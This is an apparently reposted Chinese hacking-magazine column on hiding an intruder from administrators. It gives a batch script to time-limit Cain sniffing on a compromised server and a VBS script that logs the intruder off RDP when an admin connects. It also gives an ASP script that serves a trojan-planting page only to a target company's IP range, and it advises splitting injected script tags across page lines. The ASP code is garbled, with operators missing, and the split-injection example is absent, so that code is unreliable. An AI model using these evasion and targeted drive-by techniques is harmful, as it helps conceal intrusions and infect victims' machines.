我在過程中注意到的細節之三

《***手冊200803》

我在***過程中注意到的細節之三

lcx前兩期中的專欄中，針對細節***這一專題，我分別寫了我在內網和注入中注意到的一些細節。其實***過程中，有時候難免會與管理員面對面，如何更好的隱蔽自己也是很重要的，一旦不注意，***工作往往前功盡棄。這期專欄中，我就如何隱蔽自己所做的一些工作，所注意到的細節來寫一下。

先來說一下嗅探吧。大家常用的工具是cain,用法大家都會了。但是cain在嗅探過程中，如果遇到流量較大的目標機，往往會把裝cain的主機搞死，從而引起管理員的注意。像有的時候，嗅了一陣後，就會把3389搞死。我也沒有更好的辦法，只能讓cain嗅一段時間後停止，再重新開始。如果每次都是手工去停止cain，有時候時間掌握的不及時，3389已經死掉了。其實解決這個問題很簡單，乙個簡單的批處理指令碼就可以了。指令碼內容如下： ★

ping 127.0.0.1 -n 5000>nul

taskkill /f /pid 4144 ★

上邊批處理指令碼中，5000是秒數，用來控制cain的嗅探時間。4144是cain的程序數，可以自己用tasklist查一下就知道了。這樣一來，你可以放心在嗅探這段時間內去做別的事了。

再來呢，用cain嗅探一般會在3389上，這時候如果碰到管理員登陸3389也不太好辦，我的好友netpatch寫過乙個終端監視指令碼，一旦發現有兩人同時登陸終端的話就登出自己。指令碼內容如下： ★

on error resume next

set arg=wscript.arguments

if arg.count=0 then

wscript.echo 「use:// cscript.exe fs.vbs port」

sleep 1000

wscript.quit

end if

tport=arg(0)

runs=false

while runs=false

dim oshell,oexec,strout,oregexp,matches,match,num,tport

set oshell = wscript.createobject(」wscript.shell」)

set oexec = oshell.exec(」netstat -an」)

set oregexp = new regexp

oregexp.pattern = 「tcp[\s]+[\d\.]+:」&tport&」[\s]+[\d\.]+:[\d]+[\s]+established」

oregexp.ignorecase = true

oregexp.global = true

do while not oexec.stdout.atendofstream

strout = strout & oexec.stdout.readline() & chr(13) & chr(10)

loop

set matches = oregexp.execute(strout)

num = 0

for each match in matches

num = num + 1

if num > 1 then

runs=true

oshell.run 「logoff」

end if

set matches = nothing

set oregexp = nothing

set oexec = nothing

set oshell = nothing

wend ★

用此指令碼，登陸終端時開啟就可以了，這也是乙個比較好的隱藏自己的辦法。

最後來說一下掛馬。掛馬的隱蔽方法也有很多，以前**上講過幾期。如果只是盲目的掛馬多搞幾台肉雞的話，那個隨便你了。但是有時候我們***了乙個公司的 web站，目標卻是他們的內網。這時候你掛馬可能會掛出太多的無用機器，如果你知他們公司內網出口的ip段的話，我們可以限制一下ip段使其更有針對性。這個asp指令碼如下：

」獲取訪問者的位址

ip=request.servervariables(」remote_addr」)

『允許的ip位址段為

allowip1=」221.221.221.1″

allowip2=」221.221.221.254″

if checkip(ip,allowip1,allowip2)=true then

response.write 「你掛馬的頁面」

end if

function checkip(ip,allowip1,allowip2)

dim check(4)

checkip=false

ipstr=split(ip,」.」)

allow1=split(allowip1,」.」)

allow2=split(allowip2,」.」)

if cint(allow1(0))>cint(allow2(0)) then 」判斷ip位址段是否合法

response.write 「禁止訪問」

exit function

end if

for i=0 to ubound(ipstr)

if cint(allow1(i))cint(allow2(i)) then

check(i)=false

checkip=false

exit for

else

check(i)=true

checkip=true

end if

else

if cint(allow1(i))>cint(ipstr(i)) or cint(allow1(i))ubound(ipstr) then

exit for

end if

else

check(i)=true

end if

if (check(0)=true and check(1)=true and check(2)=true and check(3)=false) and (cint(allow2(2))>cint(ipstr(2))) then

checkip=true

end if

end function

這個指令碼也許考慮得不太周到，但是我覺得足夠用了。掛馬的隱蔽方法也有很多，我最常用的是**分隔法。記得劍心有篇文章，提到過最短的跨站方法，我們也可以用這種方法來掛馬的。好比常規掛馬語句拆分一下轉換為： ★

★這樣轉換的好處是上邊的每一行可以分開插入在同一頁面不同行中，這樣一來就會隱蔽一點了。當然如何更好的隱蔽自己有很多不同的辦法，各人各有巧妙不同。這篇文章只是拋磚引玉，能引起大家的思考我就心滿意足了。

我在過程中注意到的細節之三

我在過程中注意到的細節（一）

開發過程中注意事項及優化（持續更新）

vue cli4 x使用過程中注意事項

我在 過程中注意到的細節之三

我在 過程中注意到的細節（一）

開發過程中注意事項及優化（持續更新 ）

vue cli4 x使用過程中注意事項

相關推薦

我在過程中注意到的細節之三

我在過程中注意到的細節（一）

開發過程中注意事項及優化（持續更新）